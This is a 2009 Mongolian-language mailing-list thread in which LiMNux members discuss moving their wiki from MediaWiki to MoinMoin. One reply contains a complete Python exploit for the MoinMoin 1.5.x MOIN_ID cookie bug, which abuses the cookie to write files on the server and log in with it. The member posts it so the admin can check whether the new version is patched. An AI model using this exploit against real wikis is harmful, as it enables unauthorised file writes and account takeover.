MoinMoin-ыг туршиж үзээрэй

4 views
Skip to first unread message

DULMANDAKH Sukhbaatar

unread,
May 27, 2009, 5:09:38 AM5/27/09
to lim...@googlegroups.com
Сайн байцгаана уу.

Викиг хэрхэн сайжруулах талаар бид өмнө урт удаан хугацаанд ярилцсан.
Хувийн зүгээс багахан судалгаа хийсэн бөгөөд одоо байгаа mediawiki[1]
дээр суурилсан систем нь бидний хэрэгцээг бүрэн хангаж чадахгүй юм
байна, харин moinmoin [2] илүү тохиромжтой юм байна гэсэн дүгнэлтэд
хүрсэн юм. Эдгээр системүүдийн дэлгэрэнгүй харьцуулалтыг
http://www.wikimatrix.org/compare/MediaWiki+MoinMoin хуудаснаас үзэж
болох ч миний хувьд доорх үндэслэлүүдийг голчлон авч үзэж байна.

- хуудас бүр дээр хандах эрх тавьж болно. бүлгэм маань тодорхой
асуудал хариуцсан дэд багуудад хуваагдах болсон бөгөөд тэдгээр багууд
нь өөрийн хариуцсан хуудастай, зөвхөн багийнхан л өөрчлөх эрхтэй байх
нь чухал байна. жишээ нь, сонины баг гаргахаар бэлтгэж буй сонины
хуудсыг үүсгээд, бэлэн болох хүртэл багийн гишүүдээс өөр хэн ч үзэх
боломжгүйгээр тохируулж болох юм. мөн нутагшуулалтын эсвэл
зохицуулагчдыг багтай холбоотой хуудсуудыг багийн гишүүд л өөрчлөх
боломжтой байх нь илүү зохимжтой гэж үзэж байна. хамгийн том давуу тал
нь энэ болов уу.

- баг үүсгэх боломж. хуудас бүр дээр хандах эрхтэй хэрэглэгч бүрийг
тодорхойлж өгөх боломжтой гэж хэлсэн. гэхдээ хэрэглэгч тэр бүрийг
тодорхойлох нь төвөгтэй байж болох тул дураараа баг үүсгэж, багийн
гишүүдийг тодорхойлсноор хандах эрхийг хувь хүнээр биш багаар тавьж
болох юм. өөрөөр хэлбэл багийн гишүүд өөрчлөгдсөн тохиолдолд бид бүх
хуудасны хандах эрхийг биш зөвхөн багийн гишүүдийг сольсноор хандах
эрхийг хялбар шийдэх боломжтой юм. саяхан хэн нэгэн робот
нутагшуулалтын багийн хуудсыг уншигдахгүй болгосон байхыг та бүхэн
харсан. үүнээс сэргийлэх, ийм зүйл болсон тохиолдолд багийн гишүүд
revert буюу хуучин хэлбэрт нь хялбар оруулах боломжтой байх байсан.

- өмнөх систем дээр Page/SubPage гэж үүсгэх боломжтой ч энэ боломж нь
жаахан хязгаарлагдмал, зарим нэг үйлдэл хийхэд бэрх юм билээ. Жишээ
нь, бид нутагшуулалтын багтай холбоотой мэдээллийг LocalizationTeam/*
гэж үүсгэх шаардлагатай байгаа билээ.

- категор үүсгэх нь хялбар, мэдээллийг тухайн ангилалд оруулах нь маш
энгийн. энэ нь биднийг мэдээллээ илүү цэгцтэй, ойлгомжтой байлгахад
туслах юм.

- шууд OpenID дэмжлэгтэй. өөрөөр хэлбэл бид өнөөдөр ашиглаж буй Google
дээрх хэрэглэгчийн нэр, нууц үгээ ашиглах боломжтой юм. бид олон өөр
өөр зүйл цээжлэх хэрэггүй болно гэсэн үг. гэхдээ одоогийн байдлаар энэ
боломжийг хаасан байгаа. эцсийн байдлаар wiki.limnux.org руу
шилжүүлсний дараа нээхгүй бол дараа нь тэдгээр хэрэглэгчдээрээ хандах
боломжгүй болох юм билээ.

- ажиллагааны хувьд, ашиглахад өмнөх системээс бараг ялгаагүй. шинэ
зүйл сурах хэрэгтэй болж байна гэж битгий ойлгоорой. бараг ялгаагүй
учир ашиглаж эхлэхэд төдийлөн хүндрэл гарахгүй болов уу.

- файлтай ажиллахад илүү хялбар. бид зурагтай гарын авлага бэлдэхэд
хүндрэл гарч байсан.

эцэст нь бас миний хувьд гэвэл.
- аюулгүй байдлын хувьд илүү найдвартай. серверийг нь хариуцдагийн
хувьд мэдээллийн аюулгүй байдал, серверийн аюулгүй байдал цаашлаад та
бүхний аюулгүй байдал миний хувьд маш чухал билээ. тэгэхээр миний
хувьд энэ их чухал санагдаж байна.

http://moin.limnux.org хаяг дээр суулгасан байгаа бөгөөд бүртгүүлээгүй
хэрэглэгч хуудас энэ тэр үүсгэх, чөлөөтэй ашиглах боломжийг олгосон
байгаа. бүртгүүлж үзсэн ч болно. гэхдээ өмнө хэлж байснаар
wiki.limnux.org руу шилжүүлбэл openid-г идэвхижүүлэх бөгөөд Google
хаягаа ашиглан нэвтрэх боломжтой болох юм. та бүхнийг туршиж үзээд,
өөрийн сэтгэгдлээсээ хуваалцана гэдэгт итгэлтэй байна.

нөгөө талаас өмнө хэлж байсанчлан GNOME, Apache, Ubuntu, Debian,
Fedora гэх мэт томоохон төслүүд сонгон ашигладаг нь зүгээр нэг хэрэг
биш байх гэж бодож байна.


[1] http://www.mediawiki.org
[2] http://www.moinmo.in

--
Regards
Dulmandakh
http://www.dulmandakh.com

DULMANDAKH Sukhbaatar

unread,
May 27, 2009, 5:18:55 AM5/27/09
to lim...@googlegroups.com
хэрэв гишүүдэд татгалзах зүйл байхгүй бол 6-р сараас эхлэн ашиглаж,
одоо байгаа мэдээллүүдийг шилжүүлж, ангилах ажлыг хийх санал гаргаж
байна.

S.Otgonlkhagva

unread,
May 27, 2009, 6:56:36 AM5/27/09
to lim...@googlegroups.com
хэрэв гишүүдэд татгалзах зүйл байхгүй бол 6-р сараас эхлэн ашиглаж,
одоо байгаа мэдээллүүдийг шилжүүлж, ангилах ажлыг хийх санал гаргаж
байна.
 
Би дэмжиж байна. Гэхдээ доор бичигдсэн script-ийг туршаад нэг үзээрэй. Moin 1.5.x хувилбартаа байсан bug нь Moin 1.8.3 хувилбар дээрээ засагдсан эсгийг шалгаад үзээрэй.
#!/usr/bin/python
#
#Exploit for the MOIND_ID cookie Bug
# MoinMoin 1.5.x
#
#Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630
#
#Bug and exploit coded by just a nonroot and colombian user
#
#Enero 21 de 2008
#
#Greets: el directorio and all the SL community
#
#
import urllib2,sys
print "MoinMoin host: i.e: http://127.0.0.1:8000/"
host=raw_input("MoinMoin host ( include http and /): ")
#info for the new user
#
#user for the test
user='nonroot'
#password for the test
password='nonrootuser'
#email for the test
email='ju...@nonrootuser.co'
#file to overwrite
#by default this file is there, is there?
archivo='README'
#######
#
req = urllib2.Request(host)
adddata="action=userform&name="+user+"&aliasname=ilikecolombianpeople&password="+password+"&password2="+password+"&email="+email+"&css_url=&edit_rows=20&theme_name=modern&editor_default=text&editor_ui=freechoice&tz_offset=0&datetime_fmt=&language=&remember_me=1&show_fancy_diff=1&show_toolbar=1&show_page_trail=1&quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si&save=Save"
headers={'Cookie':'MOIN_ID='+archivo}
req = urllib2.Request(host+"UserPreferences/",adddata,headers)
try:
r = urllib2.urlopen(req)
data=r.read()
except urllib2.HTTPError:
print "Wait a minute, is posible that the file: "+archivo+" doesn't have permission to write, think well, and try again"
sys.exit(2)
print "Ok, the file: "+archivo+" was created, and you can logging setting the cookie MOIN_ID='"+archivo+"'"+" in your browser."
sys.exit(0)

DULMANDAKH Sukhbaatar

unread,
May 27, 2009, 7:01:39 AM5/27/09
to lim...@googlegroups.com
> Би дэмжиж байна. Гэхдээ доор бичигдсэн script-ийг туршаад нэг үзээрэй. Moin
> 1.5.x хувилбартаа байсан bug нь Moin 1.8.3 хувилбар дээрээ засагдсан эсгийг
> шалгаад үзээрэй.

нэг ийм цоорхой аль дээр гараад, нэх удалгүй засагдсан санагдаж байна.
өнөөдөр нэг заваараа үзээд хариу өгье. дэмжиж байгаад бас санаа тавьж
анхааруулга өгсөнд баярлалаа.

xacaa

unread,
May 27, 2009, 11:37:16 AM5/27/09
to lim...@googlegroups.com
> хэрэв гишүүдэд татгалзах зүйл байхгүй бол 6-р сараас эхлэн ашиглаж,
Татгалзах зүйл алга. Үнэхээр wiki-гээс энгийн, давуу, боломжийн мэт
санагдлаа. Бүх том том нээлттэй эхийн төслүүд үүнийг ашиглаад байхад бид
яагаад болохгүй гэж.

> одоо байгаа мэдээллүүдийг шилжүүлж, ангилах ажлыг хийх санал гаргаж
> байна.
Шилжүүлэхэд тийм ч их хүндрэл учрахгүй мэт. Яг л адилхан кодчлол
ашигладаг юм байна шүү дээ. Бараг шууд хуулаад тавьчихад л болох юм
байна. Хамгийн гоё нь зураг оруулж болдог, бас GUI орчинд бичиж болдог
нь туйлийн их таалагдлаа. Одоо wiki-гээс илүү сонирхолтой байх болно гэж
найдаж байна.

Dolugen

unread,
May 27, 2009, 9:54:54 AM5/27/09
to LiMNux
MoinMoin-г судалж үзсэн. Пайтон дээр бичигдсэн, 100000-с дээш
нийтлэлтэй вики-д тохиромжгүй гэсэн хоёр баримт үүнийг сонгохыг
болиулсан даа. Пайтонд А ч байхгүй, бас 100000-с илүү нийтлэлтэй болж
өсөх вики эхлүүлэх гэж байгаа болоод л тэр.

Харин функцийн хувьд Медиавики-гээс хувь илүү гэдэгтэй санал нийлж
байна. Ерөнхийдөө, дэмжиж байнаа.

On May 27, 5:09 pm, DULMANDAKH Sukhbaatar <dulmand...@gmail.com>
wrote:


> Сайн байцгаана уу.
>
> Викиг хэрхэн сайжруулах талаар бид өмнө урт удаан хугацаанд ярилцсан.
> Хувийн зүгээс багахан судалгаа хийсэн бөгөөд одоо байгаа mediawiki[1]
> дээр суурилсан систем нь бидний хэрэгцээг бүрэн хангаж чадахгүй юм
> байна, харин moinmoin [2] илүү тохиромжтой юм байна гэсэн дүгнэлтэд

> хүрсэн юм. Эдгээр системүүдийн дэлгэрэнгүй харьцуулалтыгhttp://www.wikimatrix.org/compare/MediaWiki+MoinMoinхуудаснаас үзэж

> http://moin.limnux.orgхаяг дээр суулгасан байгаа бөгөөд бүртгүүлээгүй

xacaa

unread,
May 27, 2009, 12:25:27 PM5/27/09
to lim...@googlegroups.com
> MoinMoin-г судалж үзсэн. Пайтон дээр бичигдсэн, 100000-с дээш
> нийтлэлтэй вики-д тохиромжгүй гэсэн хоёр баримт үүнийг сонгохыг
100000 гэдэг ч их сонсогдож байна шүү ;)

> болиулсан даа. Пайтонд А ч байхгүй, бас 100000-с илүү нийтлэлтэй болж
> өсөх вики эхлүүлэх гэж байгаа болоод л тэр.
Python дээр бичигдсэн нь бидэнд харин ч илүү боломж олгоно гэж бодоод
байх юм.


DULMANDAKH Sukhbaatar

unread,
May 27, 2009, 6:17:11 PM5/27/09
to lim...@googlegroups.com
> MoinMoin-г судалж үзсэн. Пайтон дээр бичигдсэн, 100000-с дээш
> нийтлэлтэй вики-д тохиромжгүй гэсэн хоёр баримт үүнийг сонгохыг
> болиулсан даа. Пайтонд А ч байхгүй, бас 100000-с илүү нийтлэлтэй болж
> өсөх вики эхлүүлэх гэж байгаа болоод л тэр.

нийтлэлүүдээ файл хэлбэрээр хадгалдаг, тэр бүгд нь нэг хавтсанд
хадгалагддаг болохоор 32000-с дээш хуудас ext3 дээр үүсгэх боломжгүй
болдог. учир нь ext3 дээр нэг хавтсанд 32000-с дээш файл байх
боломжгүй. харин ийм хязгаар бараг байхгүй xfs, jfs, ext4 гээд олон
файлын системүүдийг ашиглах боломж байгаа болохоор сүртэй асуудал
үүсгэхгүй байх. тэгээд ч 32000 хүртэл бас ч хол байна даа. тулаад
ирвэл бид шилжүүлчихэж болно.

манайд л пайтон ашиглах нь ховор болохоос бид бусад газар бол PHP биш
зөвхөн пайтон байдаг шиг байна лээ.

Dolugen

unread,
May 28, 2009, 10:12:50 AM5/28/09
to LiMNux
Уучлаарай, линукс, пайтон сайн мэдэхгүй болохоор тохиромжгүй юм бичсэн
байж магад ;)

On May 28, 6:17 am, DULMANDAKH Sukhbaatar <dulmand...@gmail.com>
wrote:

Dolugen

unread,
Jun 4, 2009, 1:53:26 AM6/4/09
to LiMNux
Гар загатнаад MoinMoin-ыг суулгаж үзлээ хэхэ. Хажуугаар нь python
суръя.

MediaWiki, MoinMoin хоёроос гадна WikkaWiki (PHP) гэж нэг хөөрхөн вики
скрипт байдаг юм байна. Хуудас тус бүрт хандалтын зөвшөөрөл олгож
болдог, визивигтэй, маш хурдан, авсаархан, өргөтгөх боломж ихтэй гээд
олон давуу талтай ч l10n, i18n, юникод одоогоор дэмжээгүй (хак хийж
болох ч), freelinking (CamelCase-н нөгөөх нь, википедиа дээрх шиг л,
уншихад эвтэйхэн гэх юм уу даа) гэх мэт зарим сул талтай юм байна. Ер
нь боломжийн санагдсан шүү :)

On 27 May, 17:09, DULMANDAKH Sukhbaatar <dulmand...@gmail.com> wrote:
> Сайн байцгаана уу.
>
> Викиг хэрхэн сайжруулах талаар бид өмнө урт удаан хугацаанд ярилцсан.
> Хувийн зүгээс багахан судалгаа хийсэн бөгөөд одоо байгаа mediawiki[1]
> дээр суурилсан систем нь бидний хэрэгцээг бүрэн хангаж чадахгүй юм
> байна, харин moinmoin [2] илүү тохиромжтой юм байна гэсэн дүгнэлтэд

> хүрсэн юм. Эдгээр системүүдийн дэлгэрэнгүй харьцуулалтыгhttp://www.wikimatrix.org/compare/MediaWiki+MoinMoinхуудаснаас үзэж

> http://moin.limnux.orgхаяг дээр суулгасан байгаа бөгөөд бүртгүүлээгүй

Reply all
Reply to author
Forward
0 new messages